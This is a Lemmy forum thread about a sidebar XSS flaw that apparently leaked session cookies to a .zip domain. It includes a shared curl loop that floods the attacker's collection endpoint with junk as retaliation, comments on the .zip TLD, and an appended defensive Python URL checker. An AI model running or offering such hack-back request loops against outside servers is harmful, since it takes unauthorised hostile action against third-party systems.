(URGENT) Lemmy has an XSS vulnerability in the sidebar - sh.itjust.works
(sh.itjust.works)
Discussion about the aussie.zone instance itself
I don't know how people feel about "getting back" at the people compromising servers, but I did find an awesome comment on another post that basically gives you a Terminal command to inject garbage into the "hackers'" server, meaning they'd have to sift through garbage to find proper session cookies.
Link to the comment
If you don't want to click the comment (don't blame you!), then this is what it says.
And the code you can run in Terminal on macOS/Linux or Windows (if you have WSL installed):
while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64) > /dev/null ; sleep 1; done
Wow a .zip domain already being used for bad, who could have seen that coming...
Generic TLDs are terrible all round if you ask me, but I still can't believe ICANN was somehow collectively stupid enough to approve '.zip'. Regulatory capture by Google, I guess?
For anyone unaware of the issues with '.zip' as a top-level domain, see here: https://financialstatement.zip/
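The confusion the comments above point at is that a string which reads like a filename ("financialstatement.zip") is also a perfectly valid hostname, and that a URL's userinfo syntax (the part before an `@`) lets the text in front of the real host look like a path. The following is an added example written for this thread, not code from Lemmy or from any of the commenters: a small Python checker that reports when a URL's real host sits under a filename-like TLD, when an `@` moves the real host to the end of the authority section, and when bare tokens in free text could be auto-linked by a chat client. The TLD set, the look-alike slash characters and all sample inputs are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# TLDs that collide with everyday file extensions (assumed set for this example)
FILENAME_TLDS = {"zip", "mov"}
# Characters that render like '/' but are not URL path separators
# (assumed, illustrative subset: U+2215 DIVISION SLASH, U+2044 FRACTION SLASH)
LOOKALIKE_SLASHES = {"\u2215", "\u2044"}


def analyse_url(url):
    """Return the real host, its TLD and a list of human-readable findings."""
    findings = []
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        # urlsplit rejects some non-ASCII authorities outright; report, don't crash
        return {"host": "", "tld": "", "findings": [f"parser rejected URL: {exc}"]}
    # .hostname already strips userinfo and port and lower-cases the result
    host = (parts.hostname or "").lower()
    tld = host.rsplit(".", 1)[-1] if "." in host else ""
    if tld in FILENAME_TLDS:
        findings.append(f"host {host!r} is registered under .{tld}, a filename-like TLD")
    if "@" in parts.netloc:
        findings.append("authority contains '@': the text before it is userinfo, "
                        f"the real host is {host!r}")
    if any(ch in parts.netloc for ch in LOOKALIKE_SLASHES):
        findings.append("authority contains look-alike slash characters")
    return {"host": host, "tld": tld, "findings": findings}


# Bare tokens such as 'report.zip' that are not already part of a URL or path
_BARE_NAME = re.compile(r"(?<![\w./@-])[\w-]+(?:\.[\w-]+)*\.(zip|mov)(?![\w.-])", re.I)


def linkifiable_filenames(text):
    """Filename-looking tokens an auto-linking client may turn into https://<token>/."""
    return [m.group(0) for m in _BARE_NAME.finditer(text)]


if __name__ == "__main__":
    # Constructed sample inputs for a quick demonstration
    for sample in (
        "https://financialstatement.zip/",
        "https://example.com/report.zip",
        "https://github.com\u2215kubernetes\u2215archive\u2215@v1271.zip",
    ):
        result = analyse_url(sample)
        print(sample, "->", result["host"], result["findings"] or "no findings")
    print(linkifiable_filenames("see attached q3_financials.zip and notes.txt"))
```

Note the second sample: a path that merely ends in `.zip` on an ordinary host produces no findings, so the check is about where the host actually is, not about the string "zip" appearing anywhere in the link.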